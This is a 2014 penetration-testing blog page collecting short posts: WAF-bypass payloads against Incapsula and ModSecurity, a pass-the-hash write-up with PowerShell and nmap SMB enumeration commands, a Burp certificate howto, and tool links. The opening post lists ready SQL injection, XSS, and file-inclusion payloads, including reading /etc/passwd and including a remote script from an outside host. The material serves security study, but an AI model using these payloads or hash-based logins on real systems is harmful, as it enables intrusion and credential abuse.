CVE Feeds

Jul 31, 2014

Howto: bypass Incapsula and ModSecurity List

SQLi
-  /poc.php?Search2=joxy%27%20group%20by%20testzsl%20having%201=1--

XSS
-  /poc.php?x=%3C/h2%3E%3Cinput%20onfocus=prompt%28%27ZSL%27%29;%20autofocus%3E
-   /poc.php?x=%3C/h2%3E%3Cbody%20oninput=alert%281%29%3E%3Cinput%20autofocus%3E

-   /poc.php?x=%3C/h2%3E%3Cobject%20data=%22data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==%22%3E%3C/object%3E

LFI/RFI
-  /poc.php?cmd2=http://google.com?
-  /poc.php?cmd2=cat%20\/etc/\/passwd
-  /poc.php?cmd2=http://dni.destr0y.net/x.txt
-  /poc.php?cmd2=http://96.8.122.139/x.php?????????


Source: http://www.intelligentexploit.com/articles/CloudFlare-vs-Incapsula-vs-ModSecurity.pdf

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Fix "Error code: sec_error_untrusted_issuer" in Firefox

When I test some HTTPS website with BurpSuite + Firefox . I got "(Error code: sec_error_untrusted_issuer)" and I can't go any page of a target website. So I must add exception this certificate to my Firefox. This is how to do that.
1. Go to your Preference.

2. Go to Advance Tab -> Certificates

3. View Certificates

 4. Click Add Exception
5. Fill your target website

6. Get Certificate -> Confirm Security Exception

7.  OK

8. Try visit the website again.


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jul 30, 2014

Pass-the-Hash is Dead: Long Live Pass-the-Hash

Source: http://www.harmj0y.net/blog/penetesting/pass-the-hash-is-dead-long-live-pass-the-hash/  

“Administrators” are no longer able to execute code with WMI or PSEXEC, use schtasks or at, or even browse the open shares on the target machine. the RID 500 built-in Administrator account, even if it’s renamed. While Windows 7 installs will now disable this account by default and prompt for a user to set up another local administrator, many organizations used to standard advice and compliance still have loads of RID 500 accounts, enabled, all over their enterprise.


 However, when you try to use PSEXEC or WMIS to trigger agents or commands, or use Impacket’s functionality to browse the file shares, you’ll encounter something like this:

 The “pth-winexe” example above shows the difference between invalid credentials (NT_STATUS_LOGON_FAILURE) and the new patch behavior. If you happen to have the plaintext, through group policy preferences, some Mimikatz luck, or cracking the dumped NTLM hashes, you can still RDP to a target successfully with something like rdesktop -u mike -p password 192.168.52.151.

If we have Powershell access on a Windows domain machine, you can try enumerating all the local groups on a target machine with something like:
  • $computer = [ADSI]“WinNT://WINDOWS2,computer”
  • $computer.psbase.children | where { $_.psbase.schemaClassName -eq ‘group’ } | foreach { ($_.name)[0]}
If we want the members of a specific group, that’s not hard either:
  • $members = @($([ADSI]“WinNT://WINDOWS2/Administrators”).psbase.Invoke(“Members”))
  • $members | foreach { $_.GetType().InvokeMember(“ADspath”, ‘GetProperty’, $null, $_, $null) }
the Nmap scripts smb-enum-groups.nse and smb-enum-users.nse can accomplish the same thing using a valid account for the machine (even a member of local admins!) along a password or hash:
  • nmap -p U:137,T:139 –script-args ‘smbuser=mike,smbhash=8846f7eaee8fb117ad06bdd830b7586c’ –script=smb-enum-groups –script=smb-enum-users 192.168.52.151
If you want to use a domain account, set your flags to something like –script-args ‘smbdomain=DOMAIN,smbuser=USER,smbpass/smbhash=X’. You’ll be able to enumerate the RID 500 account name and whether it’s disabled, as well as all the members of the local Administrators group on the machine. If there’s a returned member of the Administrator group that doesn’t show up in the smb-enum-users list, like ‘Jason’ in this instance, it’s likely a domain account.  This information can give you a better idea of what credentials will work where, and what systems/accounts you need to target.




 


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Video: Hack in Paris 2014

Link: https://www.youtube.com/playlist?list=PL3UAg9Zuj1yLmemIKw-domjg5UkbN-pLc


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Wlister - Web application firewall designed to whitelist and/or blacklist HTTP requests.

wlister is a web application firewall (WAF) allowing web application protection based on whitelisting and attacks signature. The former is used to quickly validating an authorized and well formed request. The latter is used to detect known attacks patterns into HTTP requests.
Using wlister it is possible to apply both methods and to combine them at will.
wlister allows to describe interactions between the web application and the client, using each piece of a HTTP request and their combination as a potential validation point (URI, parameters, headers, content, method, protocol, ...).

Source:  https://github.com/etombini/wlister


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Video: Recon 2014

Link :: http://recon.cx/2014/video/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

CheatSheet: SQL Join



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jul 29, 2014

Tools: WAPMap - Convert .netxml files output by Kismet to Google Map Engine


Usage: ./wap_mapper.py <Kismet.netxml File> <Mode> <Output File Name>
Example: ./wap_mapper.py /root/Kismet-20140725-22-33-53-1.netxml -wep wep_networks.csv
Example will parse the provided .netxml file and output a csv file of WEP networks for upload to Google Maps Engine

Source:
http://www.shortbus.ninja/wardriving-with-kismet-and-wapmap/
https://github.com/hack1thu7ch/WAPMap

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

CheatSheet: SQLMap from Packetstorm



Source: http://packetstorm.foofus.com/papers/cheatsheets/sqlmap-cheatsheet-1.0-SDB.pdf


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jul 28, 2014

Article: บทวิเคราะห์ Instagram(เมื่อปี 2012)

Link:: https://db.tt/RJgoVhEJ

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.
 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |